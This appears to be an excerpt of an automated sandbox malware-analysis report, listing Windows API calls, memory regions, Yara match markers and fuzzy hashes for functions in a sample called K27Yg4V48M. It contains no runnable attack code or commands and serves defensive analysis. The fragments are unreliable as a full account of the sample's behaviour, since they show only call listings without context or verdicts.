                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                    • _wcslen.LIBCMT ref: 0040227F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                    • String ID: Tahoma
                                                                                                    • API String ID: 3832963559-3580928618
                                                                                                    • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                    • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                    • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                    • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                    • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                    • ReleaseCapture.USER32 ref: 004025F2
                                                                                                    • GetDC.USER32(00000000), ref: 00402619
                                                                                                    • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                    • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                    • DestroyWindow.USER32(?), ref: 00402754
                                                                                                    • SetCapture.USER32(?), ref: 004027A1
                                                                                                    • GetDC.USER32(00000000), ref: 004027D5
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                    • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                    • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                    • String ID: gya
                                                                                                    • API String ID: 2545303185-1989253062
                                                                                                    • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                    • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                    • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                    • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 2509303402-0
                                                                                                    • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                    • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                    • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                    • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 2509303402-0
                                                                                                    • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                    • Instruction ID: f1b8dbd1cbbf2db696e7c6760cee632497bd312936b1fa4e87a761f5725e0ed6
                                                                                                    • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                    • Instruction Fuzzy Hash: 25B1CFB19402099FDB22DFA8C880BEEBBF6BF08304F14406DF495A7241D775A965CF60
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                    • _free.LIBCMT ref: 0043A631
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 0043A653
                                                                                                    • _free.LIBCMT ref: 0043A668
                                                                                                    • _free.LIBCMT ref: 0043A673
                                                                                                    • _free.LIBCMT ref: 0043A695
                                                                                                    • _free.LIBCMT ref: 0043A6A8
                                                                                                    • _free.LIBCMT ref: 0043A6B6
                                                                                                    • _free.LIBCMT ref: 0043A6C1
                                                                                                    • _free.LIBCMT ref: 0043A6F9
                                                                                                    • _free.LIBCMT ref: 0043A700
                                                                                                    • _free.LIBCMT ref: 0043A71D
                                                                                                    • _free.LIBCMT ref: 0043A735
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0213A8A3
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C0F
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C21
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C33
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C45
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C57
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C69
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C7B
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C8D
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139C9F
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139CB1
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139CC3
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139CD5
                                                                                                      • Part of subcall function 02139BF2: _free.LIBCMT ref: 02139CE7
                                                                                                    • _free.LIBCMT ref: 0213A898
                                                                                                      • Part of subcall function 021336D1: HeapFree.KERNEL32(00000000,00000000,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?), ref: 021336E7
                                                                                                      • Part of subcall function 021336D1: GetLastError.KERNEL32(?,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?,?), ref: 021336F9
                                                                                                    • _free.LIBCMT ref: 0213A8BA
                                                                                                    • _free.LIBCMT ref: 0213A8CF
                                                                                                    • _free.LIBCMT ref: 0213A8DA
                                                                                                    • _free.LIBCMT ref: 0213A8FC
                                                                                                    • _free.LIBCMT ref: 0213A90F
                                                                                                    • _free.LIBCMT ref: 0213A91D
                                                                                                    • _free.LIBCMT ref: 0213A928
                                                                                                    • _free.LIBCMT ref: 0213A960
                                                                                                    • _free.LIBCMT ref: 0213A967
                                                                                                    • _free.LIBCMT ref: 0213A984
                                                                                                    • _free.LIBCMT ref: 0213A99C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction ID: bb14792e13a322a1dbba1c0add317a9b4d1f390fb56a2c28eb147cc7fec045cd
                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                    • Instruction Fuzzy Hash: F7318171680301DFEB22AF38D848B56B7EBBF00355F1144A9E499D7650DF71E990CB98
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                    • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                    • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0211F228,00000004,02117D87,00000004,02118069), ref: 0211EEF9
                                                                                                    • GetLastError.KERNEL32(?,0211F228,00000004,02117D87,00000004,02118069,?,02118799,?,00000008,0211800D,00000000,?,?,00000000,?), ref: 0211EF05
                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0211F228,00000004,02117D87,00000004,02118069,?,02118799,?,00000008,0211800D,00000000,?,?,00000000), ref: 0211EF15
                                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0211EF2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF41
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF58
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF6F
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF86
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF9D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2340687224-4050573280
                                                                                                    • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                    • Instruction ID: 5d453d2b260761ce196bdd2e56b7bf979617b74974782756e99e7711ff0c51fc
                                                                                                    • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                    • Instruction Fuzzy Hash: 86215EB5944711BFE7106FB4AC0CA5ABFA8EF05B16F004A3AF955E3650CB7C94418FA8
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0211F228,00000004,02117D87,00000004,02118069), ref: 0211EEF9
                                                                                                    • GetLastError.KERNEL32(?,0211F228,00000004,02117D87,00000004,02118069,?,02118799,?,00000008,0211800D,00000000,?,?,00000000,?), ref: 0211EF05
                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,0211F228,00000004,02117D87,00000004,02118069,?,02118799,?,00000008,0211800D,00000000,?,?,00000000), ref: 0211EF15
                                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 0211EF2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF41
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF58
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF6F
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF86
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF9D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2340687224-4050573280
                                                                                                    • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                    • Instruction ID: cf1b96f5881b71094b3c67159f717a641d0e21f90ea148e58fb160fad8748e90
                                                                                                    • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                    • Instruction Fuzzy Hash: 7D216DB5944711BFE7106FB49C08A5ABFECEF05B16F008A3AF955E3650CB7C94418BA8
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0211670B), ref: 021124B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021124C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021124D2
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0211670B), ref: 02112500
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02112507
                                                                                                    • GetLastError.KERNEL32(?,?,?,0211670B), ref: 02112522
                                                                                                    • GetLastError.KERNEL32(?,?,?,0211670B), ref: 0211252E
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112544
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02112552
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID: kernel32.dll
                                                                                                    • API String ID: 4179531150-1793498882
                                                                                                    • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                    • Instruction ID: 102e7ac98f18a374446f1549eac34469d5b4723083355f7ee57d126d17b9be2d
                                                                                                    • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                    • Instruction Fuzzy Hash: 2E11A1799403207FE7157B74BC99AAB7BACAE06B527200536FC01E3191EB79D5008AAD
                                                                                                    APIs
                                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                      • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                    • String ID: pContext$switchState
                                                                                                    • API String ID: 3151764488-2660820399
                                                                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                    • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                      • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                      • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                    • GetLastError.KERNEL32 ref: 004197B9
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: eventObject
                                                                                                    • API String ID: 1999291547-1680012138
                                                                                                    • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                    • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                    • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                    • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02120C36
                                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02120C9D
                                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02120CBA
                                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02120D20
                                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02120D35
                                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02120D47
                                                                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02120D75
                                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02120D80
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02120DAC
                                                                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02120DBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3720063390-0
                                                                                                    • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                    • Instruction ID: d6e523d3cb870a3d02a08441a9984579a034b0e76aa56e65f99ad8345e90938a
                                                                                                    • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                    • Instruction Fuzzy Hash: D541F370A8426C9FCF18FFA4C4907ED77A2AF15304F1401A9E8056B2C2DB769A2DCF61
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00431DFA
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 00431E06
                                                                                                    • _free.LIBCMT ref: 00431E11
                                                                                                    • _free.LIBCMT ref: 00431E1C
                                                                                                    • _free.LIBCMT ref: 00431E27
                                                                                                    • _free.LIBCMT ref: 00431E32
                                                                                                    • _free.LIBCMT ref: 00431E3D
                                                                                                    • _free.LIBCMT ref: 00431E48
                                                                                                    • _free.LIBCMT ref: 00431E53
                                                                                                    • _free.LIBCMT ref: 00431E61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 02132061
                                                                                                      • Part of subcall function 021336D1: HeapFree.KERNEL32(00000000,00000000,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?), ref: 021336E7
                                                                                                      • Part of subcall function 021336D1: GetLastError.KERNEL32(?,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?,?), ref: 021336F9
                                                                                                    • _free.LIBCMT ref: 0213206D
                                                                                                    • _free.LIBCMT ref: 02132078
                                                                                                    • _free.LIBCMT ref: 02132083
                                                                                                    • _free.LIBCMT ref: 0213208E
                                                                                                    • _free.LIBCMT ref: 02132099
                                                                                                    • _free.LIBCMT ref: 021320A4
                                                                                                    • _free.LIBCMT ref: 021320AF
                                                                                                    • _free.LIBCMT ref: 021320BA
                                                                                                    • _free.LIBCMT ref: 021320C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction ID: 421215ba8abd7433ff5ff213a57cb1830827e681f41f0d23a763b3144e0ccea6
                                                                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                    • Instruction Fuzzy Hash: 151160B6640108BFCB42EF94C845CD93BABEF04350B5180A5BA188F221DB71EFA09FC4
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe
                                                                                                    • String ID: F(@$F(@
